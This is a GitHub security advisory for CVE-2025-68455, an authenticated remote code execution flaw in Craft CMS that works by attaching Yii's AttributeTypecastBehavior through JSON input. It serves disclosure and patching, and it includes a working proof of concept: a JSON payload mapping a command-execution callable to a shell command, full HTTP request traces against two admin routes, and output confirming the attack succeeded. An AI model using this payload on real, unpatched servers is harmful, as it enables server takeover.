GHSA-255J-QW47-WJH5

Vulnerability from github – Published: 2026-01-05 18:50 – Updated: 2026-01-06 15:52
VLAI?
Summary
Craft CMS vulnerable to potential authenticated Remote Code Execution via malicious attached Behavior
Details

Note that attackers must have administrator access to the Craft Control Panel for this to work.

Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue.

Resources:

https://github.com/craftcms/cms/commit/6e608a1a5bfb36943f94f584b7548ca542a86fef

https://github.com/craftcms/cms/commit/27f55886098b56c00ddc53b69239c9c9192252c7

https://github.com/craftcms/cms/commit/ec43c497edde0b2bf2e39a119cded2e55f9fe593

https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04

Summary

This was reported as a vulnerability in Yii framework on August 7th (https://github.com/yiisoft/yii2/security/advisories/GHSA-gcmh-9pjj-7fp4). The Yii framework team denies responsibility for this (placing the onus on application developers) and hence has not (and seemingly will not) provide a fix at the framework level. Hence, I am reporting this to Craft as I found it to affect the latest (5.6.0) version of Craft CMS.

Leveraging a legitimate but maliciously crafted Yii Behavior class, it’s possible to trigger Remote Code Execution (RCE) via Reflection when the tainted Behavior is attached to a Yii Component, and an event is also fired on the tainted Component.

Details

This vulnerability is inspired by CVE-2024-4990 but differs because a legitimate Yii Behavior class is used to abuse the magic __set() and __get() methods to trigger an arbitrary PHP callable, ultimately leading to RCE. As such, this bypasses the mitigations implemented for CVE-2024-4990 and the related CVE-2024-58136.

Using the as <behavior> syntax in JSON POST input, it’s possible to attach Behavior classes to Yii Components, which was the crux of the vulnerability identified in CVE-2024-4990. Fixes for that vulnerability and the related CVE-2024-58136 ensured that only classes of type Behavior could be attached to a Component. Craft CMS also implemented additional logic to prevent arbitrary Behavior classes from being attached to the vulnerable Component.

A new vulnerability has been identified that bypasses the fixes for the previous vulnerabilities by using a legitimate but specially crafted Behavior class, namely the yii\behaviors\AttributeTypecastBehavior. Attaching a Behavior of this type allows the attacker to define an arbitrary callable that is triggered if any event is fired on the tainted Component.

Using a wildcard event listener (specified as on * in JSON input) allows the attacker to catch any event called on the tainted Component and redirect the flow of control to call self::beforeSave of the AttributeTypecastBehavior, triggering the attacker-defined callable and resulting in RCE.

See the commented payload below:

{
  "as xxx": {
    "__class": "yii\\behaviors\\AttributeTypecastBehavior",
    "__construct()": [
      {
        "attributeTypes": {
          "typecastBeforeSave": ["Psy\\Readline\\Hoa\\ConsoleProcessus", "execute"] // Attacker defined callable
        },
        "typecastBeforeSave": "touch /tmp/touch" // Argument for the callable
      }
    ]
  },
  "on *": "self::beforeSave" // When any event is fired on the Component, call beforeSave() of the AttributeTypecastBehavior to trigger the attacker-defined callable with the argument above
}

This was found to affect two separate controllers/routes in Craft CMS admin functionality, though others may be affected: * /index.php?p=admin%2Factions%2Ffields%2Fapply-layout-element-settings * /index.php?p=admin%2Factions%2Ffields%2Frender-card-preview

PoC

  • Install Craft CMS via Composer:
$ composer create-project "craftcms/craft" app
  • Use the built-in server to launch Craft CMS:
$ ./craft serve 127.0.0.1:9090
  • The following HTTP traces show the payload used to trigger the vulnerability on each of the vulnerable routes:

/index.php?p=admin%2Factions%2Ffields%2Fapply-layout-element-settings

POST /index.php?p=admin%2Factions%2Ffields%2Fapply-layout-element-settings&v=1763562868146 HTTP/1.1
Host: 127.0.0.1:9090
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:145.0) Gecko/20100101 Firefox/145.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1:9090/admin/settings/categories/new
Content-Type: application/json
X-Requested-With: XMLHttpRequest
X-Registered-Asset-Bundles: 815d39ea,22e517a2,aee7f8dc,26c46c25,e505ffd6,6b4d7555,bb2f10a0,e5e48399,fc0bc163,1ccab40d,1e21896b,54698ee0,b842675b,1c3c9add,4b1fd285,d8d08e47,8f00ce04,8768f48b,cf3018d6,ec6d0256,eccadbb
X-Registered-Js-Files: 
X-CSRF-Token: NElpp0FZTEyq2Yi4lyNbtvf5Qbtd3QIi8AUd4cJQjVKBFZrT8xSXNSuQHr269qyDYJm1hnoc98dlKRN1zAqj5r8hETtg8v1-rwd8YI-lJZxz_poluu6hCs2P6CRNu8yltOgF6vPsxT09sIund8NSBu4aocboYd0msvEcOWcT7sDsEWppVKyGSdPFMowzbbMBtBEwWz8F1AkjfAPB9NiL5HBs15C3LosCpHoXqEtehagy_Tfeff6QtVn8V1egfIjYz5jhAq6Btkklw6ZQESZG_z3F19sRKQwFxpgbzTZFULvHRKRDzP4XjYzHOKm5iR163amWgYw22pGIpA5f3_3LBIsoNqFxjJbbEo4R05ZSVldMl7jZSSQqMMbkObaaWuhwK_5q1m0B
Content-Length: 1787
Origin: http://127.0.0.1:9090
Connection: keep-alive
Cookie: CraftSessionId=b8veo0jao7aso9f9sas5irahcc; CRAFT_CSRF_TOKEN=f0a58b5c53676765154b56f4434bf49b7adac3eee76250658acfbb63999e3103a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A147%3A%22ovlsHz0Ok-P3sS7agNo0_yx5XNCdjbpe_hdCFMkb%7C0b5b94bb740394a585337f1d087e4eeb1904ba802d27bf2d6a97fe35d30bda3bovlsHz0Ok-P3sS7agNo0_yx5XNCdjbpe_hdCFMkb%7C1%22%3B%7D; c3ace995f4d19645dc65b957cf54e92e_identity=2c5abb45e65baee8d4fef5a873df2367ab1c42598a8937138bcba58593033d68a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22c3ace995f4d19645dc65b957cf54e92e_identity%22%3Bi%3A1%3Bs%3A162%3A%22%5B1%2C%22%5B%5C%22CdWbsSlpUey1DCRudhcod_xy0tXLc2oIHlOAeYLTAqOmF0rBIv2zaXQp4eg4AUBRc0qQr5G5wElj01yRXhojzuRZnPIW-GJqGo_U%5C%22%2Cnull%2C%5C%22961fe1815772f9207245de1a33ecd079%5C%22%5D%22%2C1209600%5D%22%3B%7D; c3ace995f4d19645dc65b957cf54e92e_username=28fa03238cbef8d3f349cde0ed37d8c62118163d18695ccdb5feec2a05906303a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22c3ace995f4d19645dc65b957cf54e92e_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D; Craft-cd62f980-7ec7-4e9a-8d60-f781e5744a68:sidebar=expanded; Craft-cd62f980-7ec7-4e9a-8d60-f781e5744a68:sidebar-details=expanded
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0

{"uid":"c295eb34-dd4c-42ac-8d07-1b8c872a126d","layoutConfig":{"uid":"08ef66f3-f69e-495b-882f-56834efab200","tabs":[{"name":"Content","uid":"6f1efe1c-2de5-4783-ab39-7ff9149a9c90","userCondition":null,"elementCondition":null,"elements":[{"type":"craft\\fieldlayoutelements\\TitleField","inputType":null,"autocomplete":false,"class":null,"size":null,"name":null,"autocorrect":true,"autocapitalize":true,"disabled":false,"readonly":false,"title":null,"placeholder":null,"step":null,"min":null,"max":null,"requirable":false,"id":null,"containerAttributes":[],"inputContainerAttributes":[],"labelAttributes":[],"orientation":null,"label":null,"instructions":null,"tip":null,"warning":null,"providesThumbs":false,"includeInCards":false,"width":100,"dateAdded":"2025-11-19T06:33:18-08:00","uid":"bae4dcd7-635b-41fe-96a3-4d3d69e91969","userCondition":null,"elementCondition":null},{"type":"craft\\fieldlayoutelements\\CustomField","handle":null,"label":null,"instructions":null,"tip":null,"warning":null,"required":false,"providesThumbs":false,"includeInCards":false,"width":100,"dateAdded":null,"uid":"c295eb34-dd4c-42ac-8d07-1b8c872a126d","userCondition":null,"elementCondition":null,"fieldUid":"12ac060b-8c40-48a6-b70f-94361245b149","editCondition":null}]}],"generatedFields":[],"cardView":[],"cardThumbAlignment":"end","type":"craft\\elements\\Category"},"elementType":"craft\\elements\\Category","config":{
  "as xxx": {
    "__class": "yii\\behaviors\\AttributeTypecastBehavior",
    "__construct()": [
      {
        "attributeTypes": {
          "typecastBeforeSave": ["Psy\\Readline\\Hoa\\ConsoleProcessus", "execute"]
        },
        "typecastBeforeSave": "touch /tmp/touch111"
      }
    ]
  },
  "on *": "self::beforeSave"
},"settingsNamespace":null,"settings":null}

/index.php?p=admin%2Factions%2Ffields%2Frender-card-preview

POST /index.php?p=admin%2Factions%2Ffields%2Frender-card-preview&v=1763562868148 HTTP/1.1
Host: 127.0.0.1:9090
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:145.0) Gecko/20100101 Firefox/145.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1:9090/admin/settings/categories/new
Content-Type: application/json
X-Requested-With: XMLHttpRequest
X-Registered-Asset-Bundles: 815d39ea,22e517a2,aee7f8dc,26c46c25,e505ffd6,6b4d7555,bb2f10a0,e5e48399,fc0bc163,1ccab40d,1e21896b,54698ee0,b842675b,1c3c9add,4b1fd285,d8d08e47,8f00ce04,8768f48b,cf3018d6,ec6d0256,eccadbb
X-Registered-Js-Files: 
X-CSRF-Token: NElpp0FZTEyq2Yi4lyNbtvf5Qbtd3QIi8AUd4cJQjVKBFZrT8xSXNSuQHr269qyDYJm1hnoc98dlKRN1zAqj5r8hETtg8v1-rwd8YI-lJZxz_poluu6hCs2P6CRNu8yltOgF6vPsxT09sIund8NSBu4aocboYd0msvEcOWcT7sDsEWppVKyGSdPFMowzbbMBtBEwWz8F1AkjfAPB9NiL5HBs15C3LosCpHoXqEtehagy_Tfeff6QtVn8V1egfIjYz5jhAq6Btkklw6ZQESZG_z3F19sRKQwFxpgbzTZFULvHRKRDzP4XjYzHOKm5iR163amWgYw22pGIpA5f3_3LBIsoNqFxjJbbEo4R05ZSVldMl7jZSSQqMMbkObaaWuhwK_5q1m0B
Content-Length: 424
Origin: http://127.0.0.1:9090
Connection: keep-alive
Cookie: CraftSessionId=b8veo0jao7aso9f9sas5irahcc; CRAFT_CSRF_TOKEN=f0a58b5c53676765154b56f4434bf49b7adac3eee76250658acfbb63999e3103a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A147%3A%22ovlsHz0Ok-P3sS7agNo0_yx5XNCdjbpe_hdCFMkb%7C0b5b94bb740394a585337f1d087e4eeb1904ba802d27bf2d6a97fe35d30bda3bovlsHz0Ok-P3sS7agNo0_yx5XNCdjbpe_hdCFMkb%7C1%22%3B%7D; c3ace995f4d19645dc65b957cf54e92e_identity=2c5abb45e65baee8d4fef5a873df2367ab1c42598a8937138bcba58593033d68a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22c3ace995f4d19645dc65b957cf54e92e_identity%22%3Bi%3A1%3Bs%3A162%3A%22%5B1%2C%22%5B%5C%22CdWbsSlpUey1DCRudhcod_xy0tXLc2oIHlOAeYLTAqOmF0rBIv2zaXQp4eg4AUBRc0qQr5G5wElj01yRXhojzuRZnPIW-GJqGo_U%5C%22%2Cnull%2C%5C%22961fe1815772f9207245de1a33ecd079%5C%22%5D%22%2C1209600%5D%22%3B%7D; c3ace995f4d19645dc65b957cf54e92e_username=28fa03238cbef8d3f349cde0ed37d8c62118163d18695ccdb5feec2a05906303a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22c3ace995f4d19645dc65b957cf54e92e_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D; Craft-cd62f980-7ec7-4e9a-8d60-f781e5744a68:sidebar=expanded; Craft-cd62f980-7ec7-4e9a-8d60-f781e5744a68:sidebar-details=expanded
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0

{"fieldLayoutConfig":{
  "as xxx": {
    "__class": "yii\\behaviors\\AttributeTypecastBehavior",
    "__construct()": [
      {
        "attributeTypes": {
          "typecastBeforeSave": ["Psy\\Readline\\Hoa\\ConsoleProcessus", "execute"]
        },
        "typecastBeforeSave": "touch /tmp/touch222"
      }
    ]
  },
  "on *": "self::beforeSave"
},"cardElements":[],"showThumb":null,"thumbAlignment":"end"}
  • Check the filesystem to confirm the creation of the two files in /tmp and hence confirm RCE:
$ ls -la /tmp/
...
-rw-rw-r--  1 calum calum       0 Nov 19 16:05 touch111
-rw-rw-r--  1 calum calum       0 Nov 19 16:05 touch222

Impact

An attacker with access to Craft CMS admin functionality, specifically the routes listed above, can trigger RCE on the backend server and potentially gain control of the server.

Severity ?
8.6 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 5.8.20"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "craftcms/cms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0-RC1"
            },
            {
              "fixed": "5.8.21"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.16.16"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "craftcms/cms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0-RC1"
            },
            {
              "fixed": "4.16.17"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-68455"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-470"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-05T18:50:14Z",
    "nvd_published_at": "2026-01-05T22:15:52Z",
    "severity": "HIGH"
  },
  "details": "Note that attackers must have administrator access to the Craft Control Panel for this to work.\n\nUsers should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue.\n\nResources:\n\nhttps://github.com/craftcms/cms/commit/6e608a1a5bfb36943f94f584b7548ca542a86fef\n\nhttps://github.com/craftcms/cms/commit/27f55886098b56c00ddc53b69239c9c9192252c7\n\nhttps://github.com/craftcms/cms/commit/ec43c497edde0b2bf2e39a119cded2e55f9fe593\n\nhttps://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04\n\n### Summary\n\nThis was reported as a vulnerability in Yii framework on August 7th (https://github.com/yiisoft/yii2/security/advisories/GHSA-gcmh-9pjj-7fp4). The Yii framework team denies responsibility for this (placing the onus on application developers) and hence has not (and seemingly will not) provide a fix at the framework level. Hence, I am reporting this to Craft as I found it to affect the latest (`5.6.0`) version of Craft CMS.\n\nLeveraging a legitimate but maliciously crafted Yii `Behavior` class, it\u2019s possible to trigger Remote Code Execution (RCE) via Reflection when the tainted `Behavior` is attached to a Yii `Component`, and an event is also fired on the tainted `Component`.\n\n### Details\nThis vulnerability is inspired by `CVE-2024-4990` but differs because a legitimate Yii `Behavior` class is used to abuse the magic `__set()` and `__get()` methods to trigger an arbitrary PHP callable, ultimately leading to RCE. As such, this bypasses the mitigations implemented for `CVE-2024-4990` and the related `CVE-2024-58136`.\n\nUsing the `as \u003cbehavior\u003e` syntax in JSON POST input, it\u2019s possible to [attach](https://www.yiiframework.com/doc/guide/2.0/en/concept-behaviors#attaching-behaviors) `Behavior` classes to Yii `Components`, which was the crux of the vulnerability identified in `CVE-2024-4990`. Fixes for that vulnerability and the related `CVE-2024-58136` ensured that only classes of type `Behavior` could be attached to a `Component`. Craft CMS also implemented additional logic to prevent arbitrary `Behavior` classes from being attached to the vulnerable `Component`.\n\nA new vulnerability has been identified that bypasses the fixes for the previous vulnerabilities by using a legitimate but specially crafted `Behavior` class, namely the `yii\\behaviors\\AttributeTypecastBehavior`. Attaching a `Behavior` of this type allows the attacker to define an arbitrary callable that is triggered if any event is fired on the tainted `Component`.\n\nUsing a [wildcard](https://www.yiiframework.com/doc/guide/2.0/en/concept-events#wildcard-events) event listener (specified as `on *` in JSON input) allows the attacker to catch any event called on the tainted `Component` and redirect the flow of control to call `self::beforeSave` of the `AttributeTypecastBehavior`, triggering the attacker-defined callable and resulting in RCE.\n\nSee the commented payload below:\n\n```json\n{\n  \"as xxx\": {\n    \"__class\": \"yii\\\\behaviors\\\\AttributeTypecastBehavior\",\n    \"__construct()\": [\n      {\n        \"attributeTypes\": {\n          \"typecastBeforeSave\": [\"Psy\\\\Readline\\\\Hoa\\\\ConsoleProcessus\", \"execute\"] // Attacker defined callable\n        },\n        \"typecastBeforeSave\": \"touch /tmp/touch\" // Argument for the callable\n      }\n    ]\n  },\n  \"on *\": \"self::beforeSave\" // When any event is fired on the Component, call beforeSave() of the AttributeTypecastBehavior to trigger the attacker-defined callable with the argument above\n}\n```\n\nThis was found to affect two separate controllers/routes in Craft CMS admin functionality, though others may be affected:\n* /index.php?p=admin%2Factions%2Ffields%2Fapply-layout-element-settings\n* /index.php?p=admin%2Factions%2Ffields%2Frender-card-preview\n\n### PoC\n* Install Craft CMS via Composer:\n```\n$ composer create-project \"craftcms/craft\" app\n```\n* Use the built-in server to launch Craft CMS:\n```\n$ ./craft serve 127.0.0.1:9090\n```\n* The following HTTP traces show the payload used to trigger the vulnerability on each of the vulnerable routes:\n\n**/index.php?p=admin%2Factions%2Ffields%2Fapply-layout-element-settings**\n\n```\nPOST /index.php?p=admin%2Factions%2Ffields%2Fapply-layout-element-settings\u0026v=1763562868146 HTTP/1.1\nHost: 127.0.0.1:9090\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:145.0) Gecko/20100101 Firefox/145.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: http://127.0.0.1:9090/admin/settings/categories/new\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nX-Registered-Asset-Bundles: 815d39ea,22e517a2,aee7f8dc,26c46c25,e505ffd6,6b4d7555,bb2f10a0,e5e48399,fc0bc163,1ccab40d,1e21896b,54698ee0,b842675b,1c3c9add,4b1fd285,d8d08e47,8f00ce04,8768f48b,cf3018d6,ec6d0256,eccadbb\nX-Registered-Js-Files: \nX-CSRF-Token: NElpp0FZTEyq2Yi4lyNbtvf5Qbtd3QIi8AUd4cJQjVKBFZrT8xSXNSuQHr269qyDYJm1hnoc98dlKRN1zAqj5r8hETtg8v1-rwd8YI-lJZxz_poluu6hCs2P6CRNu8yltOgF6vPsxT09sIund8NSBu4aocboYd0msvEcOWcT7sDsEWppVKyGSdPFMowzbbMBtBEwWz8F1AkjfAPB9NiL5HBs15C3LosCpHoXqEtehagy_Tfeff6QtVn8V1egfIjYz5jhAq6Btkklw6ZQESZG_z3F19sRKQwFxpgbzTZFULvHRKRDzP4XjYzHOKm5iR163amWgYw22pGIpA5f3_3LBIsoNqFxjJbbEo4R05ZSVldMl7jZSSQqMMbkObaaWuhwK_5q1m0B\nContent-Length: 1787\nOrigin: http://127.0.0.1:9090\nConnection: keep-alive\nCookie: CraftSessionId=b8veo0jao7aso9f9sas5irahcc; CRAFT_CSRF_TOKEN=f0a58b5c53676765154b56f4434bf49b7adac3eee76250658acfbb63999e3103a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A147%3A%22ovlsHz0Ok-P3sS7agNo0_yx5XNCdjbpe_hdCFMkb%7C0b5b94bb740394a585337f1d087e4eeb1904ba802d27bf2d6a97fe35d30bda3bovlsHz0Ok-P3sS7agNo0_yx5XNCdjbpe_hdCFMkb%7C1%22%3B%7D; c3ace995f4d19645dc65b957cf54e92e_identity=2c5abb45e65baee8d4fef5a873df2367ab1c42598a8937138bcba58593033d68a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22c3ace995f4d19645dc65b957cf54e92e_identity%22%3Bi%3A1%3Bs%3A162%3A%22%5B1%2C%22%5B%5C%22CdWbsSlpUey1DCRudhcod_xy0tXLc2oIHlOAeYLTAqOmF0rBIv2zaXQp4eg4AUBRc0qQr5G5wElj01yRXhojzuRZnPIW-GJqGo_U%5C%22%2Cnull%2C%5C%22961fe1815772f9207245de1a33ecd079%5C%22%5D%22%2C1209600%5D%22%3B%7D; c3ace995f4d19645dc65b957cf54e92e_username=28fa03238cbef8d3f349cde0ed37d8c62118163d18695ccdb5feec2a05906303a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22c3ace995f4d19645dc65b957cf54e92e_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D; Craft-cd62f980-7ec7-4e9a-8d60-f781e5744a68:sidebar=expanded; Craft-cd62f980-7ec7-4e9a-8d60-f781e5744a68:sidebar-details=expanded\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nPriority: u=0\n\n{\"uid\":\"c295eb34-dd4c-42ac-8d07-1b8c872a126d\",\"layoutConfig\":{\"uid\":\"08ef66f3-f69e-495b-882f-56834efab200\",\"tabs\":[{\"name\":\"Content\",\"uid\":\"6f1efe1c-2de5-4783-ab39-7ff9149a9c90\",\"userCondition\":null,\"elementCondition\":null,\"elements\":[{\"type\":\"craft\\\\fieldlayoutelements\\\\TitleField\",\"inputType\":null,\"autocomplete\":false,\"class\":null,\"size\":null,\"name\":null,\"autocorrect\":true,\"autocapitalize\":true,\"disabled\":false,\"readonly\":false,\"title\":null,\"placeholder\":null,\"step\":null,\"min\":null,\"max\":null,\"requirable\":false,\"id\":null,\"containerAttributes\":[],\"inputContainerAttributes\":[],\"labelAttributes\":[],\"orientation\":null,\"label\":null,\"instructions\":null,\"tip\":null,\"warning\":null,\"providesThumbs\":false,\"includeInCards\":false,\"width\":100,\"dateAdded\":\"2025-11-19T06:33:18-08:00\",\"uid\":\"bae4dcd7-635b-41fe-96a3-4d3d69e91969\",\"userCondition\":null,\"elementCondition\":null},{\"type\":\"craft\\\\fieldlayoutelements\\\\CustomField\",\"handle\":null,\"label\":null,\"instructions\":null,\"tip\":null,\"warning\":null,\"required\":false,\"providesThumbs\":false,\"includeInCards\":false,\"width\":100,\"dateAdded\":null,\"uid\":\"c295eb34-dd4c-42ac-8d07-1b8c872a126d\",\"userCondition\":null,\"elementCondition\":null,\"fieldUid\":\"12ac060b-8c40-48a6-b70f-94361245b149\",\"editCondition\":null}]}],\"generatedFields\":[],\"cardView\":[],\"cardThumbAlignment\":\"end\",\"type\":\"craft\\\\elements\\\\Category\"},\"elementType\":\"craft\\\\elements\\\\Category\",\"config\":{\n  \"as xxx\": {\n    \"__class\": \"yii\\\\behaviors\\\\AttributeTypecastBehavior\",\n    \"__construct()\": [\n      {\n        \"attributeTypes\": {\n          \"typecastBeforeSave\": [\"Psy\\\\Readline\\\\Hoa\\\\ConsoleProcessus\", \"execute\"]\n        },\n        \"typecastBeforeSave\": \"touch /tmp/touch111\"\n      }\n    ]\n  },\n  \"on *\": \"self::beforeSave\"\n},\"settingsNamespace\":null,\"settings\":null}\n```\n\n**/index.php?p=admin%2Factions%2Ffields%2Frender-card-preview**\n\n```\nPOST /index.php?p=admin%2Factions%2Ffields%2Frender-card-preview\u0026v=1763562868148 HTTP/1.1\nHost: 127.0.0.1:9090\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:145.0) Gecko/20100101 Firefox/145.0\nAccept: application/json, text/plain, */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate, br\nReferer: http://127.0.0.1:9090/admin/settings/categories/new\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nX-Registered-Asset-Bundles: 815d39ea,22e517a2,aee7f8dc,26c46c25,e505ffd6,6b4d7555,bb2f10a0,e5e48399,fc0bc163,1ccab40d,1e21896b,54698ee0,b842675b,1c3c9add,4b1fd285,d8d08e47,8f00ce04,8768f48b,cf3018d6,ec6d0256,eccadbb\nX-Registered-Js-Files: \nX-CSRF-Token: NElpp0FZTEyq2Yi4lyNbtvf5Qbtd3QIi8AUd4cJQjVKBFZrT8xSXNSuQHr269qyDYJm1hnoc98dlKRN1zAqj5r8hETtg8v1-rwd8YI-lJZxz_poluu6hCs2P6CRNu8yltOgF6vPsxT09sIund8NSBu4aocboYd0msvEcOWcT7sDsEWppVKyGSdPFMowzbbMBtBEwWz8F1AkjfAPB9NiL5HBs15C3LosCpHoXqEtehagy_Tfeff6QtVn8V1egfIjYz5jhAq6Btkklw6ZQESZG_z3F19sRKQwFxpgbzTZFULvHRKRDzP4XjYzHOKm5iR163amWgYw22pGIpA5f3_3LBIsoNqFxjJbbEo4R05ZSVldMl7jZSSQqMMbkObaaWuhwK_5q1m0B\nContent-Length: 424\nOrigin: http://127.0.0.1:9090\nConnection: keep-alive\nCookie: CraftSessionId=b8veo0jao7aso9f9sas5irahcc; CRAFT_CSRF_TOKEN=f0a58b5c53676765154b56f4434bf49b7adac3eee76250658acfbb63999e3103a%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A147%3A%22ovlsHz0Ok-P3sS7agNo0_yx5XNCdjbpe_hdCFMkb%7C0b5b94bb740394a585337f1d087e4eeb1904ba802d27bf2d6a97fe35d30bda3bovlsHz0Ok-P3sS7agNo0_yx5XNCdjbpe_hdCFMkb%7C1%22%3B%7D; c3ace995f4d19645dc65b957cf54e92e_identity=2c5abb45e65baee8d4fef5a873df2367ab1c42598a8937138bcba58593033d68a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22c3ace995f4d19645dc65b957cf54e92e_identity%22%3Bi%3A1%3Bs%3A162%3A%22%5B1%2C%22%5B%5C%22CdWbsSlpUey1DCRudhcod_xy0tXLc2oIHlOAeYLTAqOmF0rBIv2zaXQp4eg4AUBRc0qQr5G5wElj01yRXhojzuRZnPIW-GJqGo_U%5C%22%2Cnull%2C%5C%22961fe1815772f9207245de1a33ecd079%5C%22%5D%22%2C1209600%5D%22%3B%7D; c3ace995f4d19645dc65b957cf54e92e_username=28fa03238cbef8d3f349cde0ed37d8c62118163d18695ccdb5feec2a05906303a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%22c3ace995f4d19645dc65b957cf54e92e_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D; Craft-cd62f980-7ec7-4e9a-8d60-f781e5744a68:sidebar=expanded; Craft-cd62f980-7ec7-4e9a-8d60-f781e5744a68:sidebar-details=expanded\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nPriority: u=0\n\n{\"fieldLayoutConfig\":{\n  \"as xxx\": {\n    \"__class\": \"yii\\\\behaviors\\\\AttributeTypecastBehavior\",\n    \"__construct()\": [\n      {\n        \"attributeTypes\": {\n          \"typecastBeforeSave\": [\"Psy\\\\Readline\\\\Hoa\\\\ConsoleProcessus\", \"execute\"]\n        },\n        \"typecastBeforeSave\": \"touch /tmp/touch222\"\n      }\n    ]\n  },\n  \"on *\": \"self::beforeSave\"\n},\"cardElements\":[],\"showThumb\":null,\"thumbAlignment\":\"end\"}\n```\n* Check the filesystem to confirm the creation of the two files in `/tmp` and hence confirm RCE:\n```\n$ ls -la /tmp/\n...\n-rw-rw-r--  1 calum calum       0 Nov 19 16:05 touch111\n-rw-rw-r--  1 calum calum       0 Nov 19 16:05 touch222\n```\n\n### Impact\n\nAn attacker with access to Craft CMS admin functionality, specifically the routes listed above, can trigger RCE on the backend server and potentially gain control of the server.",
  "id": "GHSA-255j-qw47-wjh5",
  "modified": "2026-01-06T15:52:18Z",
  "published": "2026-01-05T18:50:14Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68455"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/commit/27f55886098b56c00ddc53b69239c9c9192252c7"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/commit/6e608a1a5bfb36943f94f584b7548ca542a86fef"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/commit/ec43c497edde0b2bf2e39a119cded2e55f9fe593"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/craftcms/cms"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Craft CMS vulnerable to potential authenticated Remote Code Execution via malicious attached Behavior"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.